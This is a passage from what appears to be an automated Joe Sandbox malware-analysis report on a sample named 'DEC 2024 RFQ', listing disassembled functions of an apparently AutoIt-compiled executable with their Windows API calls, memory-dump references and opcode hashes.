                                                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 000AB33B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 357397906-0
                                                                                                                      • Opcode ID: 866191c62215719c204f46333c83fdc8b2ecbecf72af22345ffdc9f41f8953c9
                                                                                                                      • Instruction ID: 964bb80f0acce26cf56485454854ba2e3267090f6f9d1e4f1aa1ac1f71c7528c
                                                                                                                      • Opcode Fuzzy Hash: 866191c62215719c204f46333c83fdc8b2ecbecf72af22345ffdc9f41f8953c9
                                                                                                                      • Instruction Fuzzy Hash: 2A114675D0060AEFDB41DFD9C4849EEBBF5FB09311F104166E914E3220D735AA559F50
                                                                                                                      Function 000AB635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 000AB644
                                                                                                                      • _memset.LIBCMT ref: 000AB653
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,000E6F20,000E6F64), ref: 000AB682
                                                                                                                      • CloseHandle.KERNEL32 ref: 000AB694
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3277943733-0
                                                                                                                      • Opcode ID: ec61f45834dad6c4b85f5b1af16536528d8ee51ac20fa73abb02b670307ceb17
                                                                                                                      • Instruction ID: 9623237da3897f379302bf6e8987b56d5df94bb8e9952db95e0ce33a3b5ac793
                                                                                                                      • Opcode Fuzzy Hash: ec61f45834dad6c4b85f5b1af16536528d8ee51ac20fa73abb02b670307ceb17
                                                                                                                      • Instruction Fuzzy Hash: 9EF0DAB26407447EF71027A5BC46FBB7A9CEB19795F404031FA09E91A2D77A5C1087A8
                                                                                                                      Function 00086BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00086BE6
                                                                                                                        • Part of subcall function 000876C4: _memset.LIBCMT ref: 000876F9
                                                                                                                      • _memmove.LIBCMT ref: 00086C09
                                                                                                                      • _memset.LIBCMT ref: 00086C16
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00086C26
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 48991266-0
                                                                                                                      • Opcode ID: a85a0cd7bb8c1e75a8c62e6f7632d240887f90c44a2204f87a82fea453e74aea
                                                                                                                      • Instruction ID: 329e1e80cbc4e72e10f76806398100aaa66a2987fe651b6e976449e5048e276f
                                                                                                                      • Opcode Fuzzy Hash: a85a0cd7bb8c1e75a8c62e6f7632d240887f90c44a2204f87a82fea453e74aea
                                                                                                                      • Instruction Fuzzy Hash: 81F05E7A200100ABCF416F95DC85A8ABB29EF46320F04C061FE08AE227D735E821CBB4
                                                                                                                      Function 00022218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000008), ref: 00022231
                                                                                                                      • SetTextColor.GDI32(?,000000FF), ref: 0002223B
                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00022250
                                                                                                                      • GetStockObject.GDI32(00000005), ref: 00022258
                                                                                                                      • GetWindowDC.USER32(?,00000000), ref: 0005BE83
                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0005BE90
                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0005BEA9
                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0005BEC2
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0005BEE2
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0005BEED
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1946975507-0
                                                                                                                      • Opcode ID: af22768186939208123b7c804fb5820d84489fc3113ff7d534c80dc3cc5af368
                                                                                                                      • Instruction ID: 107c06cdb828c8cb7ce98acdbf13a50352f72ee49a9d655bbaa57b6f8a2763a6
                                                                                                                      • Opcode Fuzzy Hash: af22768186939208123b7c804fb5820d84489fc3113ff7d534c80dc3cc5af368
                                                                                                                      • Instruction Fuzzy Hash: A4E03932504645EAEF615FA4FC0D7E83B50EB06332F148376FA69480E187764984DB22
                                                                                                                      Function 00078712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0007871B
                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,000782E6), ref: 00078722
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000782E6), ref: 0007872F
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,000782E6), ref: 00078736
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3974789173-0
                                                                                                                      • Opcode ID: 2b46195a8041ede3d1ad31a2ce1c55121edd0dde5468b8f8af2f2618238a0e55
                                                                                                                      • Instruction ID: f870df506894fa166a8e0428a375b984ccb7621b7500f79cad84c9947e0347cb
                                                                                                                      • Opcode Fuzzy Hash: 2b46195a8041ede3d1ad31a2ce1c55121edd0dde5468b8f8af2f2618238a0e55
                                                                                                                      • Instruction Fuzzy Hash: 6BE08636A552129BE7605FF05D0CFA73BACEF52791F14C828B24AC9040DA3C8441C750
                                                                                                                      Function 0007B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0007B4BE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ContainedObject
                                                                                                                      • String ID: AutoIt3GUI$Container
                                                                                                                      • API String ID: 3565006973-3941886329
                                                                                                                      • Opcode ID: 1bef01b892cc6feb4abc413a99526e4712749a3396ea59590d0f59f435021108
                                                                                                                      • Instruction ID: 8bd4127b9f823571bb7beca32b45229a1502f69727620281f6eeb18180a86e25
                                                                                                                      • Opcode Fuzzy Hash: 1bef01b892cc6feb4abc413a99526e4712749a3396ea59590d0f59f435021108
                                                                                                                      • Instruction Fuzzy Hash: 8B914970A00601AFDB64DF64C884BAAB7F5FF48710F10856EF94ACB291DB75E841CB64
                                                                                                                      Function 0008AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0003FC86: _wcscpy.LIBCMT ref: 0003FCA9
                                                                                                                        • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
                                                                                                                        • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
                                                                                                                      • __wcsnicmp.LIBCMT ref: 0008B02D
                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0008B0F6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                      • String ID: LPT
                                                                                                                      • API String ID: 3222508074-1350329615
                                                                                                                      • Opcode ID: 5813a28f762b239ec5bc5ce6f9886fb894e0f7928c4bd935348e3edb0ef14fa6
                                                                                                                      • Instruction ID: bea4507f588a4aef10c5e259b143f522289297310f939ecceefd1f33917a6673
                                                                                                                      • Opcode Fuzzy Hash: 5813a28f762b239ec5bc5ce6f9886fb894e0f7928c4bd935348e3edb0ef14fa6
                                                                                                                      • Instruction Fuzzy Hash: F3618D75A00219AFCB14EF94D895EEEB7F4FB09710F1440A9F956AB291DB30AE40CB94
                                                                                                                      Function 00032957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00032968
                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00032981
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                      • Opcode ID: 3d6eab26e8b1d5b5372422a2fa4b8c515068d279e234ceeba1d2c2dc28ca2561
                                                                                                                      • Instruction ID: ec11d775373221a20abcf9b359de1a7c285ff9ff75848d3b8cafd065c4c11f97
                                                                                                                      • Opcode Fuzzy Hash: 3d6eab26e8b1d5b5372422a2fa4b8c515068d279e234ceeba1d2c2dc28ca2561
                                                                                                                      • Instruction Fuzzy Hash: EF5147714087549BE720EF10E886BEFBBE8FB85354F42885DF6D8410A2DF318529CB66
                                                                                                                      Function 00089734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00024F0B: __fread_nolock.LIBCMT ref: 00024F29
                                                                                                                      • _wcscmp.LIBCMT ref: 00089824
                                                                                                                      • _wcscmp.LIBCMT ref: 00089837
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscmp$__fread_nolock
                                                                                                                      • String ID: FILE
                                                                                                                      • API String ID: 4029003684-3121273764
                                                                                                                      • Opcode ID: d17063aba7d2e6963332cf7a7e547ca07659e9d1a268bffefa37eca62607e9cb
                                                                                                                      • Instruction ID: bcf6d7a52fe52b5cb149b71daa59caeddc1234b8ea0d48ea6fe004c0ba33ec25
                                                                                                                      • Opcode Fuzzy Hash: d17063aba7d2e6963332cf7a7e547ca07659e9d1a268bffefa37eca62607e9cb
                                                                                                                      • Instruction Fuzzy Hash: 3941C671A0021ABADF20AEA0DC45FEFBBFDEF85710F000479F904B7182DA719A048B65
                                                                                                                      Function 0009258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0009259E
                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 000925D4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CrackInternet_memset
                                                                                                                      • String ID: |
                                                                                                                      • API String ID: 1413715105-2343686810
                                                                                                                      • Opcode ID: 2002e8284fa04845d63468debd1dabffa8ddb68a0a5f23d41fb4742e8d8a8c04
                                                                                                                      • Instruction ID: a4322cf32b850db49ffeed2160efab75e9538e78b0e90878db44d5f3a83c6c53
                                                                                                                      • Opcode Fuzzy Hash: 2002e8284fa04845d63468debd1dabffa8ddb68a0a5f23d41fb4742e8d8a8c04
                                                                                                                      • Instruction Fuzzy Hash: BC311571804119EBCF11EFA1DC85EEEBFB8FF08350F104069F919A6162EB315A56DBA0
                                                                                                                      Function 000A7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 000A7B61
                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000A7B76
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: '
                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                      • Opcode ID: 5beb3c99c49362b1bd1d78ebcdcfeb7455b0509bff828a82cb08c5144096caae
                                                                                                                      • Instruction ID: dd546d930f3a4dbd12db0c864bf2c32255b95e036043ac8aea14d6f56e72b6e2
                                                                                                                      • Opcode Fuzzy Hash: 5beb3c99c49362b1bd1d78ebcdcfeb7455b0509bff828a82cb08c5144096caae
                                                                                                                      • Instruction Fuzzy Hash: 05410A74A05209AFDB54CFA4C981BEEBBF5FF49300F10416AE908AB351D771A951CFA0
                                                                                                                      Function 000A6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 000A6B17
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 000A6B53
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                      • Opcode ID: ff44ade79854b7f3d92792b583727709e5878326f581b1080b457d4de4319cbf
                                                                                                                      • Instruction ID: 565c4e702f227217aefad4d9b8357e990342c6ed415bb4d1f5940d9534daee77
                                                                                                                      • Opcode Fuzzy Hash: ff44ade79854b7f3d92792b583727709e5878326f581b1080b457d4de4319cbf
                                                                                                                      • Instruction Fuzzy Hash: 5E318F71110604AEEB109FA8DC80BFB73B9FF49760F148619F9A5D7191DB31AC91CB60
                                                                                                                      Function 000828A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00082911
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0008294C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                      • Opcode ID: 6beb2e62447b21d44bdb8690f5886084909e0411c6351fd9b8a1bb8aac06bcad
                                                                                                                      • Instruction ID: 395a7b40932a7334e5c14653cda0703862b07ff30c7838517b2a985a0d4bebe8
                                                                                                                      • Opcode Fuzzy Hash: 6beb2e62447b21d44bdb8690f5886084909e0411c6351fd9b8a1bb8aac06bcad
                                                                                                                      • Instruction Fuzzy Hash: A2319171A00305AFEB64EF98CD85BEEBBF9FF45350F140029E9C5A61A1DB709944CB51
                                                                                                                      Function 000939E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __snwprintf.LIBCMT ref: 00093A66
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __snwprintf_memmove
                                                                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                      • API String ID: 3506404897-2584243854
                                                                                                                      • Opcode ID: cb1f6e8a96541acdf36f95d7813e46434c075f38e4db6b171ac82d402162b9ed
                                                                                                                      • Instruction ID: 57708246768303a0cc5bb685ef02eab707e5cb93131f195e1005cd9416be23ee
                                                                                                                      • Opcode Fuzzy Hash: cb1f6e8a96541acdf36f95d7813e46434c075f38e4db6b171ac82d402162b9ed
                                                                                                                      • Instruction Fuzzy Hash: B5219134600229AFCF10EF64DC82EEE77B9AF44300F504459F559AB282DB34EA45DF66
                                                                                                                      Function 000A66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000A6761
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000A676C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: Combobox
                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                      • Opcode ID: 75e16b71dc37c4d47ecb210a726dd4a002f9c42fa1fd4643e2dc660b52c76599
                                                                                                                      • Instruction ID: 871b729bce0a4c85f21d0f187f9844312c92865e3194c1c9ff8d1133d9b27672
                                                                                                                      • Opcode Fuzzy Hash: 75e16b71dc37c4d47ecb210a726dd4a002f9c42fa1fd4643e2dc660b52c76599
